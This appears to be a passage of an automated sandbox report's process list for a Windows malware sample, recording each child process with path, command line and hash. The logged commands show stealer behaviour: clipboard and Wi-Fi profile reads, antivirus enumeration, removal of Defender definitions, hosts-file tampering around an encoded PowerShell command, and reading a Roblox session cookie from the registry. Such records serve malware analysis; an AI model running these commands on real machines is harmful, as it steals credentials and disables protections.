                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:41
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff606630000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff606630000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                            Start time:02:41:55
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

Target ID:47
Start time:02:41:57
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                            Start time:02:41:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                            Start time:02:41:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                            Imagebase:0x7ff606630000
                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                            Start time:02:41:57
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                            Imagebase:0x7ff60a240000
                                                                                                                                                                                                                            File size:468'120 bytes
                                                                                                                                                                                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                            Start time:02:41:58
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:02:41:58
Start date:13/12/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff738e70000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:02:41:58
Start date:13/12/2024
Path:C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):false
Commandline:systeminfo
Imagebase:0x7ff6b9740000
File size:110'080 bytes
MD5 hash:EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:02:41:58
Start date:13/12/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh wlan show profile
Imagebase:0x7ff7a7a80000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:02:41:58
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:02:41:58
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:02:41:58
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff738e70000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:65
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:0x7ff734040000
File size:77'312 bytes
MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:66
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:67
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:68
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:69
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:70
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:71
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:72
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff738e70000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:73
Start time:02:41:59
Start date:13/12/2024
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:0x7ff7a5370000
File size:23'040 bytes
MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:74
Start time:02:42:00
Start date:13/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command omitted]
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:75
Start time:02:42:00
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:76
Start time:02:42:00
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                                                            Start time:02:42:00
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:getmac
                                                                                                                                                                                                                            Imagebase:0x7ff6ec4f0000
                                                                                                                                                                                                                            File size:90'112 bytes
                                                                                                                                                                                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:78
                                                                                                                                                                                                                            Start time:02:42:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.cmdline"
                                                                                                                                                                                                                            Imagebase:0x7ff741970000
                                                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:79
                                                                                                                                                                                                                            Start time:02:42:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:80
                                                                                                                                                                                                                            Start time:02:42:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:81
                                                                                                                                                                                                                            Start time:02:42:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:82
                                                                                                                                                                                                                            Start time:02:42:02
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:83
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:84
                                                                                                                                                                                                                            Start time:02:42:03
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff738e70000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
Has exited:true

Target ID:85
Start time:02:42:03
Start date:13/12/2024
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:0x7ff7a5370000
File size:23'040 bytes
MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:86
Start time:02:42:03
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:87
Start time:02:42:03
Start date:13/12/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:0x7ff72bec0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:88
Start time:02:42:03
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:89
Start time:02:42:03
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:90
Start time:02:42:03
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:91
Start time:02:42:03
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:92
Start time:02:42:03
Start date:13/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff606630000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:93
Start time:02:42:03
Start date:13/12/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff738e70000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:95
Start time:02:42:04
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
